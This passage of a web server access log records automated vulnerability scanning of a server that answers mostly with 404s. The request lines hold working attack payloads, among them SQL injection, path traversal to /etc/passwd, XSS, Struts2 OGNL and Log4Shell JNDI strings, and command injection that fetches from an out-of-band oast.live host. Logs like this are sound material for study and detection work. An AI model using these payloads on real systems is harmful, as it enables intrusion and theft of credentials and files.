bean.RecId=1')+AND+EXTRACTVALUE(534543,CONCAT(0x5c,md5(999999999),0x5c))+AND+('n72Yk'='n72Yk&bean.TabName=1 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12)+AppleWebKit/618.6+(KHTML,+like+Gecko)+Version/17.2+Safari/618.6 - 404 7 0 54 2024-12-12 19:41:35 103.153.214.94 GET /common/download/resource resource=/profile/../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.1+20.51 - 404 7 0 36 2024-12-12 19:41:39 103.153.214.94 GET /common/download/resource resource=/profile/../../../../Windows/win.ini 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.7.20 - 404 7 0 44 2024-12-12 19:41:53 103.153.214.94 POST /bonita/loginservice redirect=true&redirectUrl=%2Fbonita%2Fapps%2FappDirectoryBonita 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 197 2024-12-12 19:41:56 103.153.214.94 POST /admin/index.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.6)+AppleWebKit/616.20+(KHTML,+like+Gecko)+Version/17.1.83+Safari/616.20 - 404 7 0 201 2024-12-12 19:42:50 103.153.214.94 GET /mdocs-posts/ mdocs-img-preview=../../../wp-config.php 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 35 2024-12-12 19:42:52 103.153.214.94 GET / mdocs-img-preview=../../../wp-config.php 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 45 2024-12-12 19:42:57 103.153.214.94 GET / url=http://0177.0.0.1/server-status 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/618.5.10+(KHTML,+like+Gecko)+Version/17.5+Safari/618.5.10 - 404 7 0 33 2024-12-12 19:43:00 103.153.214.94 GET /index.asp - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/17.4 - 404 7 0 200 2024-12-12 19:43:00 103.153.214.94 GET / host=http://0177.0.0.1/server-status 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/102.0.0.0+Safari/537.36 - 404 7 0 31 2024-12-12 19:43:00 103.153.214.94 GET /admin/login - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_3)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.1.15 - 404 7 0 204 2024-12-12 19:43:01 103.153.214.94 POST /login.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 204 2024-12-12 19:43:01 103.153.214.94 POST /login.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 215 2024-12-12 19:43:05 103.153.214.94 GET / file=http://0177.0.0.1/etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Teak/4.3.1+Version/17.4.1+Safari/605.1.15 - 404 7 0 58 2024-12-12 19:45:01 103.153.214.94 GET /passwordrecovered.cgi id=NibKw 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 45 2024-12-12 19:45:52 103.153.214.94 GET /seeyon/thirdpartyController.do.css/..;/ajax.do - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Mobile/15E148+Safari/604.1 - 404 5 0 59 2024-12-12 19:45:52 103.153.214.94 GET /ui/login/register - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 57 2024-12-12 19:46:19 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:90.0)+Gecko/20100101+Firefox/90.0 - 404 7 0 54 2024-12-12 19:47:11 103.153.214.94 GET /index.php g=g&m=Door&a=index&content=<?php%20echo%20md5('ThinkCMF'); 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.2.27 - 404 7 0 54 2024-12-12 19:47:12 103.153.214.94 GET /wp-content/plugins/yet-another-related-posts-plugin/includes/yarpp_pro_set_display_types.php ypsdt=false&types[]=post&types[]=page 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.6.23 - 404 7 0 34 2024-12-12 19:47:12 103.153.214.94 GET /chkisg.htm?Sip=1.1.1.1+|+cat+/etc/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 400 0 0 41 2024-12-12 19:47:12 103.153.214.94 GET /data/manage/cmd.php cmd=id 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.26 - 404 7 0 56 2024-12-12 19:47:16 103.153.214.94 GET /app/etc/local.xml - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 35 2024-12-12 19:47:21 103.153.214.94 GET /app/etc/local.xml.additional - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 55 2024-12-12 19:47:25 103.153.214.94 GET /store/app/etc/local.xml - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.13;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 38 2024-12-12 19:47:40 103.153.214.94 GET /anchor/errors.log - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 31 2024-12-12 19:48:02 103.153.214.94 GET /index.php page_slug=../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 46 2024-12-12 19:48:31 103.153.214.94 GET / filename=../../../../../../etc/passwd&mphb_action=download 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 - 404 7 0 54 2024-12-12 19:49:17 103.153.214.94 GET /backup/config.xml - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+WOW64;+rv:41.0)+Gecko/20100101+Firefox/128.0+(x64+de) - 404 7 0 37 2024-12-12 19:49:26 103.153.214.94 GET /WealthT24/GetImage docDownloadPath=/etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.3.17 - 404 7 0 31 2024-12-12 19:49:30 103.153.214.94 GET /WealthT24/GetImage docDownloadPath=c:/windows/win.ini 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 58 2024-12-12 19:50:07 103.153.214.94 POST /login - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/96.0.4664.45+Safari/537.36 - 404 7 0 219 2024-12-12 19:50:32 103.153.214.94 POST /api/v2/login - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.5.23 - 404 7 0 219 2024-12-12 19:50:38 103.153.214.94 GET /package.json - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:83.0)+Gecko/20100101+Firefox/83.0 - 404 7 0 58 2024-12-12 19:50:43 103.153.214.94 GET /assets/built%2F..%2F..%2F%E0%A4%A/package.json - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 400 0 0 34 2024-12-12 19:51:03 103.153.214.94 GET /content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 5 0 59 2024-12-12 19:51:07 103.153.214.94 GET /..;/content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.7.23 - 404 5 0 37 2024-12-12 19:51:25 103.153.214.94 GET /ipecs-cm/download filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.9.17 - 404 7 0 61 2024-12-12 19:51:29 103.153.214.94 GET /ipecs-cm/download filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 54 2024-12-12 19:51:32 103.153.214.94 GET /forums/search/z-->"></script><script>alert(document.domain)</script>/ - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 400 0 0 34 2024-12-12 19:51:33 103.153.214.94 POST /cu.html - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 199 2024-12-12 19:53:23 103.153.214.94 GET /wp-content/backups-dup-lite/tmp/ - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.18 - 404 7 0 59 2024-12-12 19:53:27 103.153.214.94 GET /wp-content/backups-dup-pro/tmp/ - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_4)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/11.1+Safari/605.1.15 - 404 7 0 60 2024-12-12 19:54:21 103.153.214.94 GET /InsightPluginShowGeneralConfiguration.jspa; - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:96.0)+Gecko/20100101+Firefox/96.0 - 404 7 0 39 2024-12-12 19:54:21 103.153.214.94 GET /login - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.9.26 - 404 7 0 206 2024-12-12 19:54:25 103.153.214.94 GET /secure/WBSGanttManageScheduleJobAction.jspa; - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:92.0)+Gecko/20100101+Firefox/92.0 - 404 7 0 31 2024-12-12 19:54:51 103.153.214.94 GET /guest/users/forgotten email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1.1+Mobile/15E148+Safari/604.1 - 404 7 0 37 2024-12-12 19:55:09 103.153.214.94 POST /cobbler_api - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:103.0)+Gecko/20100101+Firefox/103.0 - 404 7 0 235 2024-12-12 19:55:10 103.153.214.94 POST /cobbler_api - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 19:56:16 103.153.214.94 GET / ... 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.4+Safari/605.1.15 - 400 0 0 67 2024-12-12 19:56:46 103.153.214.94 GET /jpeginfo/jpeginfo.php url=ctcj3jjbclslbev4n7q0iefo7f4q16rso.oast.live 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 35 2024-12-12 19:56:46 103.153.214.94 GET /index.php page=/etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 38 2024-12-12 19:56:46 103.153.214.94 GET /wan.htm - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.18 - 404 7 0 56 2024-12-12 19:57:10 103.153.214.94 GET /installer/installerUI.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 41 2024-12-12 19:57:34 103.153.214.94 GET /loyalty_enu/start.swe/>">/script><script>alert(document.domain)</script> - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 400 0 0 58 2024-12-12 19:58:18 103.153.214.94 GET /catalog.php filename=../../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 60 2024-12-12 19:58:19 103.153.214.94 GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.6.25 - 404 7 0 33 2024-12-12 19:58:19 103.153.214.94 GET /index.php option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 33 2024-12-12 19:58:19 103.153.214.94 GET /registry/machine app=D687Z&appType=0&version=0&hostname=2XtvQ&ip=ctcj3jjbclslbev4n7q0yycdqm3crmh1x.oast.live&port=0 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.6+Safari/605.1.15 - 404 7 0 54 2024-12-12 19:58:26 103.153.214.94 GET /index.php/Home/login/index.html - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Mobile/15E148+Safari/604.1 - 404 7 0 203 2024-12-12 19:58:30 103.153.214.94 GET /uir/etc/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 58 2024-12-12 19:59:05 103.153.214.94 GET /${(#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('cat+/etc/passwd').getInputStream(),#b=new+java.io.InputStreamReader(#a),#c=new++java.io.BufferedReader(#b),#d=new+char[51020],#c.read(#d),#sbtest=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#sbtest.println(#d),#sbtest.close())}/actionChain1.action - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.32+Safari/537.36 - 400 0 0 49 2024-12-12 19:59:09 103.153.214.94 GET /devices.inc.php search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 86 2024-12-12 19:59:54 103.153.214.94 GET /plus/ajax_street.php act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5(999999999),9%23 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 34 2024-12-12 20:00:28 103.153.214.94 GET /manage/fileDownloader sec=1 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 38 2024-12-12 20:01:06 103.153.214.94 POST /_session - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 - 404 7 0 203 2024-12-12 20:01:06 103.153.214.94 POST /_session - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 209 2024-12-12 20:01:06 103.153.214.94 POST /_session - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 213 2024-12-12 20:01:06 103.153.214.94 POST /_session - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/96.0.4664.45+Safari/537.36 - 404 7 0 217 2024-12-12 20:01:06 103.153.214.94 POST /_session - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.8.22 - 404 7 0 218 2024-12-12 20:01:06 103.153.214.94 POST /_session - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.24 - 404 7 0 225 2024-12-12 20:01:06 103.153.214.94 POST /_session - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 233 2024-12-12 20:01:06 103.153.214.94 POST /_session - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/117.0.0.0+Safari/537.36 - 404 7 0 608 2024-12-12 20:01:06 103.153.214.94 POST /_session - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 610 2024-12-12 20:01:06 103.153.214.94 POST /_session - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 614 2024-12-12 20:01:06 103.153.214.94 POST /_session - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 614 2024-12-12 20:01:06 103.153.214.94 POST /_session - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 634 2024-12-12 20:01:06 103.153.214.94 POST /_session - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 637 2024-12-12 20:01:06 103.153.214.94 POST /_session - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:84.0)+Gecko/20100101+Firefox/84.0 - 404 7 0 635 2024-12-12 20:01:06 103.153.214.94 POST /_session - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.1.15 - 404 7 0 212 2024-12-12 20:01:07 103.153.214.94 POST /_session - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 215 2024-12-12 20:03:12 103.153.214.94 GET /install/ - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 65 2024-12-12 20:04:52 103.153.214.94 GET /XMII/Catalog Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:95.0)+Gecko/20100101+Firefox/95.0 - 404 7 0 34 2024-12-12 20:05:28 103.153.214.94 GET /mysql_config.ini - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 59 2024-12-12 20:05:45 103.153.214.94 GET /download.php file=/etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/617.12+(KHTML,+like+Gecko)+Version/17.3+Safari/617.12 - 404 7 0 128 2024-12-12 20:06:45 103.153.214.94 GET /catalog-portal/ui/oauth/verify error&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 49 2024-12-12 20:07:04 103.153.214.94 GET /email/unsubscribed email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(/xss/)%3E 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 34 2024-12-12 20:07:06 103.153.214.94 GET /c42api/v3/LoginConfiguration username=${jndi:ldap://${:-537}${:-849}.${hostName}.username.ctcj3jjbclslbev4n7q0f8544jpjghik9.oast.live/test}&url=https://localhost 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.8.22 - 404 7 0 34 2024-12-12 20:07:36 103.153.214.94 GET /login.php/'><svg/onload=alert`2q3kZ7qAiFwGcG5te6hIqwO9O07`> - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:98.0)+Gecko/20100101+Firefox/98.0 - 400 0 0 43 2024-12-12 20:07:36 103.153.214.94 GET /dgn/dgn_tools/ping.php ipdm=2;id; 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 64 2024-12-12 20:07:36 103.153.214.94 GET /wp-content/plugins/ad-widget/views/modal/ step=../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_12_6)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/103.0.0.0+Safari/537.36 - 404 7 0 51 2024-12-12 20:08:18 103.153.214.94 POST /login.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.0+Safari/605.1.15 - 404 7 0 205 2024-12-12 20:08:34 103.153.214.94 GET /q start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o&ylabel&xrange=10:10&yrange=[33:system(%27wget%20http://ctcj3jjbclslbev4n7q0m174dp5jnp6ii.oast.live%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.5.2+Safari/605.1.15 - 404 7 0 57 2024-12-12 20:09:13 103.153.214.94 POST /rest/auth/login - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/96.0.4664.93+Safari/537.36 - 404 7 0 204 2024-12-12 20:09:14 103.153.214.94 POST /api/auth/login - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.1.15 - 404 7 0 218 2024-12-12 20:09:37 103.153.214.94 GET /css/eonweb.css - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.63 - 404 7 0 37 2024-12-12 20:09:37 103.153.214.94 GET /index.php option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.3+Safari/605.1.15 - 404 7 0 55 2024-12-12 20:09:38 103.153.214.94 GET /portal/file cmd=getFileLocal&fileid=..%2F..%2F..%2F..%2Fwebapps/nc_web/WEB-INF/web.xml 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.20 - 404 7 0 36 2024-12-12 20:09:38 103.153.214.94 GET /log_proxy url=http://ctcj3jjbclslbev4n7q0jomaezbe5pn17.oast.live 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 58 2024-12-12 20:09:47 103.153.214.94 GET /index.php option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.6+Safari/605.1.15 - 404 7 0 50 2024-12-12 20:09:47 103.153.214.94 GET /camunda/app/welcome/default/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 225 2024-12-12 20:10:07 103.153.214.94 GET /index.php option=com_jejob&view=../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.6+Safari/605.1.15 - 404 7 